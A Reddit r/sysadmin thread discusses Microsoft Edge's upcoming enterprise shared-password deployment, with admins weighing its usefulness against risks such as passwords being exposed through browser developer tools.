Enterprise Password Vaulting coming to the Microsoft Edge Web Browser
Posted by DOMZE24@reddit | sysadmin | View on Reddit | 15 comments
Just saw this in my news feed.
There’s a known security gap that you may have been tolerating out of necessity—a common password shared across a set of users. Whether it’s a team accessing the same data repository or managing common social media accounts, passwords are often passed around in emails, chats, and even on paper. This risky practice can lead to unapproved users gaining access and serious downstream consequences.
Secure password deployment in the Edge management service can help put an end to this. It enables you to deploy encrypted shared passwords to a set of users, allowing them to log into websites seamlessly without ever seeing the actual passwords, reducing the risk of unauthorized access and enhancing your organization’s overall security posture.
Secure password deployment will be available in preview in the coming months for Microsoft 365 Business Premium, E3, and E5 subscriptions.
https://blogs.windows.com/msedgedev/2024/11/19/microsoft-edge-for-business-transform-your-workday-ignite-2024/#shared-passwords
Myriade-de-Couilles@reddit
Dev tools can be disabled by policy too, I’m sure the documentation for this feature will mention this
tankerkiller125real@reddit
Yeah, no thanks, we'll stick to our proper enterprise password management tool that leaves zero trace data on the machine and has solid administrative controls. With the browser password management disabled.
How insecure is browser based password management? Well given the actual password manager we use at work can simply rip the passwords from them with zero passwords, pins, etc required to say very very insecure.
StarDestroyer78@reddit
KeePass on a secured shared drive for IT only along with a .key file and a shared secret (stored in a personal KeePass file) seems to be sufficient for me. When paired with the Kee plugin for Chrome and the AutoOpen plugin for KeePass I only have to enter my personal secret once per day and I have "saved passwords" available in my browser.
Elmofuntz@reddit
Be interesting to see how this works and prevents users from fooling the system and exposing the password. Course it would just be nice if the Edge browser had a decent password vault for normal use that was harder to extract passwords from and the enterprise had more control over.
piense@reddit
F12 sees all
PlannedObsolescence_@reddit
Disabling the developer console (already possible via browser policy) will probably be a pre-req for this feature.
Otherwise if you can get it to not submit the page after entering credentials, you could change the password field from
type="password"totype="text"and get it in plaintext.DenialP@reddit
I spoke with the Edge for Business team at the Ignite booth earlier. They are trying hard to integrate simple solutions to add value to enterprise licensing we already have or have available. The simple truth is users need a managed space for secure passwords and if we aren't providing it, then the shadow-it department is providing it (along with all of those security risks we don't like hearing about). While this doesn't add any PAM-like capacity to Edge for modern administration (I asked, worth a shot), they did add a crapload of plugin management to edge to make management easier for endusers to request (yo, dingus, this would be a signal flare that users are interested in an app, and a successful team would provide said resource if vetted or steer user in the correct, approved, and documented process... but what do I know?). Nice features and a cool team. (i'm not a microsoft employee, they'd never have me)
the edge for business team is kicking ass
we're all going to have to learn purview
hope this is somewhat insightful
quantumhardline@reddit
This shares passwords with multiple users, and for many reasons, each user should have unique login.
ReputationNo8889@reddit
But you also have tools without multi user management where password sharing is required. This closes that gap.
NobleRuin6@reddit
No kidding. That isn’t what enterprise password vaulting is for. There will always be some systems that have shared accounts that a team uses. Not that I would personally store my host roots in Edge…but I could see a use case for some credentials like service accounts.
quantumhardline@reddit
In link posted it talks about share passwords with other employees etc which is why I commented about the sharing passwords piece .. 🤦♂️
gandraw@reddit
ITT we reinvent certificate authentication.
gihutgishuiruv@reddit
> allowing them to log into websites seamlessly without ever seeing the actual passwords
I suspect "seeing" is doing some heavy lifting here. Obviously the password would still need to be decrypted on the client, and you could likely see it in the clear with e.g. browser dev tools. It seems like it would give non-technical managers a false sense of security about the "hidden-ness" of such passwords.
gregarious119@reddit
Going to be interesting to watch this get weighed in the balance of obvious security improvement vs. too many eggs in one security basket.
_BoNgRiPPeR_420@reddit
Pen testers are going to have a field day with this.